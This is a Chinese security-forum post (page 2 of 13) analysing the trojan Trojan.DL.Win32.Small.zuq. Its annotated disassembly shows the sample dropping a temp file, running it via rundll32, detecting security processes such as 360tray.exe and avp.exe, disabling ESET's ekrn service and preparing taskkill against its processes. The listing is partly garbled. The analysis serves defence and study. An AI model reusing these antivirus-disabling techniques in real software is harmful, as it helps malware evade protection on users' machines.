首页| 论坛| 搜索| 消息
>〖系统安全〗
主题:Trojan.DL.Win32.Small.zuq简单分析
z3960发表于 2023-05-18 07:24
040425A50pusheax0040425BE8 6EF9FFFF call00403BCE ; 创建文件%temp%\~1476b8.t0040426083C4 14 add esp, 140040426368 F4010000 push1F400404268FF15 A8104000 calldword ptr []; kernel32.Sleep0040426EBF 30354000 mov edi, 00403530004042738BCBmov ecx, ebx0040427533C0xor eax, eax004042778D95 60FEFFFF lea edx, dword ptr 0040427DF2:AE repne scas byte ptr es:0040427FF7D1not ecx004042812BF9sub edi, ecx004042838BF7mov esi, edi004042858BC1mov eax, ecx004042878BFAmov edi, edx00404289C1E9 02 shr ecx, 20040428CF3:A5 rep movs dword ptr es:, dword p>0040428E8BC8mov ecx, eax0040429033C0xor eax, eax0040429283E1 03 and ecx, 3004042958D95 60FEFFFF lea edx, dword ptr 0040429BF3:A4 rep movs byte ptr es:, byte ptr>0040429D8DBD 5CFDFFFF lea edi, dword ptr 004042A38BCBmov ecx, ebx004042A5F2:AE repne scas byte ptr es:004042A7F7D1not ecx004042A92BF9sub edi, ecx004042AB8BF7mov esi, edi004042AD8BFAmov edi, edx004042AF8BD1mov edx, ecx004042B18BCBmov ecx, ebx004042B3F2:AE repne scas byte ptr es:004042B58BCAmov ecx, edx004042B74Fdec edi004042B8C1E9 02 shr ecx, 2004042BBF3:A5 rep movs dword ptr es:, dword p>004042BD8BCAmov ecx, edx004042BF8D45 CC lea eax, dword ptr 004042C283E1 03 and ecx, 3004042C550pusheax004042C6F3:A4 rep movs byte ptr es:, byte ptr>004042C8BE 20354000 mov esi, 00403520; :khqsn:^u:xqa004042CD8D7D CC lea edi, dword ptr 004042D0A5movsdword ptr es:, dword ptr 004042D1A5movsdword ptr es:, dword ptr 004042D2A5movsdword ptr es:, dword ptr 004042D366:A5 movsword ptr es:, word ptr 004042D5E8 65F9FFFF call00403C3F ; 解密字符串“AboutDlgProc”004042DA8D7D CC lea edi, dword ptr 004042DD8BCBmov ecx, ebx004042DF33C0xor eax, eax004042E18D95 60FEFFFF lea edx, dword ptr 004042E7F2:AE repne scas byte ptr es:004042E9F7D1not ecx004042EB2BF9sub edi, ecx004042ED8BF7mov esi, edi004042EF8BFAmov edi, edx004042F18BD1mov edx, ecx004042F38BCBmov ecx, ebx004042F5F2:AE repne scas byte ptr es:004042F78BCAmov ecx, edx004042F94Fdec edi004042FAC1E9 02 shr ecx, 2004042FDF3:A5 rep movs dword ptr es:, dword p>004042FF8BCAmov ecx, edx004043018D95 60FEFFFF lea edx, dword ptr 0040430783E1 03 and ecx, 30040430AF3:A4 rep movs byte ptr es:, byte ptr>0040430CBF 1C354000 mov edi, 0040351C;18004043118BCBmov ecx, ebx00404313F2:AE repne scas byte ptr es:00404315F7D1not ecx004043172BF9sub edi, ecx004043198BF7mov esi, edi0040431B8BFAmov edi, edx0040431D8BD1mov edx, ecx0040431F8BCBmov ecx, ebx00404321F2:AE repne scas byte ptr es:004043238BCAmov ecx, edx004043254Fdec edi00404326C1E9 02 shr ecx, 200404329F3:A5 rep movs dword ptr es:, dword p>0040432B8BCAmov ecx, edx0040432D8D45 E8 lea eax, dword ptr 0040433083E1 03 and ecx, 30040433350pusheax00404334F3:A4 rep movs byte ptr es:, byte ptr>00404336BE 14354000 mov esi, 00403514; o}vgp0040433B8D7D E8 lea edi, dword ptr 0040433EA5movsdword ptr es:, dword ptr 0040433F66:A5 movsword ptr es:, word ptr 00404341BE 0C354000 mov esi, 0040350C; 筒断004043468D7D F0 lea edi, dword ptr 00404349A5movsdword ptr es:, dword ptr 0040434AA4movsbyte ptr es:, byte ptr 0040434BE8 EFF8FFFF call00403C3F004043508D45 F0 lea eax, dword ptr 0040435350pusheax00404354E8 E6F8FFFF call00403C3F00404359BE FC344000 mov esi, 004034FC0040435E8D7D AC lea edi, dword ptr 00404361A5movsdword ptr es:, dword ptr 00404362A5movsdword ptr es:, dword ptr 00404363A5movsdword ptr es:, dword ptr 00404364A1 F4344000 mov eax, dword ptr [4034F4]00404369A5movsdword ptr es:, dword ptr 0040436ABE E8344000 mov esi, 004034E80040436F8D7D DC lea edi, dword ptr 00404372A5movsdword ptr es:, dword ptr 004043738945 F8 mov dword ptr , eax00404376A1 F8344000 mov eax, dword ptr [4034F8]0040437BA5movsdword ptr es:, dword ptr 0040437C8945 FC mov dword ptr , eax0040437F8D45 F8 lea eax, dword ptr 0040438250pusheax00404383A5movsdword ptr es:, dword ptr 00404384E8 EEF8FFFF call00403C77 ; 解密字符串“avp.exe”004043898D45 AC lea eax, dword ptr 0040438C50pusheax0040438DE8 E5F8FFFF call00403C77 ; 解密“safeboxtray.exe”004043928D45 DC lea eax, dword ptr 0040439550pusheax00404396E8 DCF8FFFF call00403C77 ; 解密“360tray.exe”0040439B8D45 DC lea eax, dword ptr 0040439E50pusheax0040439FE8 12FDFFFF call004040B6 ; 查找进程中是否存在360tray.exe 004043A48BF0mov esi, eax004043A68D45 AC lea eax, dword ptr 004043A950pusheax004043AAE8 07FDFFFF call004040B6 ; 查找进程中是否存在safeboxtray.exe004043AF0BF0oresi, eax004043B18D45 F8 lea eax, dword ptr 004043B450pusheax004043B5E8 FCFCFFFF call004040B6 ; 查找进程中是否存在avp.exe004043BA83C4 24 add esp, 24004043BD0BF0oresi, eax004043BF74 31 jeshort 004043F2 ; 如果不存在跳004043F2004043C18D85 60FEFFFF lea eax, dword ptr 004043C750pusheax004043C88D85 48FFFFFF lea eax, dword ptr 004043CE50pusheax004043CFE8 62FDFFFF call00404136 ; 如果存在以上某个进程则直走到这,创建进程rundll32.exe执行命令行“%Temp%\~1476b8.t,AboutDlgProc 18”004043D48B35 A8104000 mov esi, dword ptr [; kernel32.Sleep004043DA6A 64 push64004043DCFFD6callesi004043DE8D85 5CFDFFFF lea eax, dword ptr 004043E450pusheax004043E5FF15 C4104000 calldword ptr [; 删除%temp%\~1476b8.t004043EB68 204E0000 push4E20004043F0FFD6callesi; 暂停20秒复制代码退出线程
7C80B714E8 CF090000 callExitThread复制代码5.尝试打开erkn服务,如果服务存在修改启动方式禁止服务,并执行命令行结束ekrn.exe和egui.exe进程
00404017BE E0344000 mov esi, 004034E0; ASCII "suxp"0040401C8D7D F8 lea edi, dword ptr 0040401F8D45 F8 lea eax, dword ptr 00404022A5movsdword ptr es:, dword ptr 0040402350pusheax00404024A4movsbyte ptr es:, byte ptr 00404025E8 15FCFFFF call00403C3F ; 解密字符串“ekrn”0040402A8D45 F8 lea eax, dword ptr 0040402D6A 04 push40040402F50pusheax00404030E8 7CFFFFFF call00403FB1 ; 尝试打开ekrn服务,如果服务存在就通过ChangeServiceConfigA修改启动方式禁止服务00404035BE D4344000 mov esi, 004034D40040403A8D7D EC lea edi, dword ptr 0040403DA5movsdword ptr es:, dword ptr 0040403EA5movsdword ptr es:, dword ptr 0040403F8D45 EC lea eax, dword ptr 0040404250pusheax00404043A4movsbyte ptr es:, byte ptr 00404044E8 F6FBFFFF call00403C3F; 解密字符串"taskkill"00404049BE C4344000 mov esi, 004034C40040404E8D7D DC lea edi, d
下一页上一页  (2/13)
回帖(3):
3 # 任逍遥
05-19 06:19
不错,了解了
2 # 任逍遥
05-19 06:19
来看一下
1 # 爱我中华
05-18 15:13
长知识了

全部回帖(3)»
最新回帖
收藏本帖
发新帖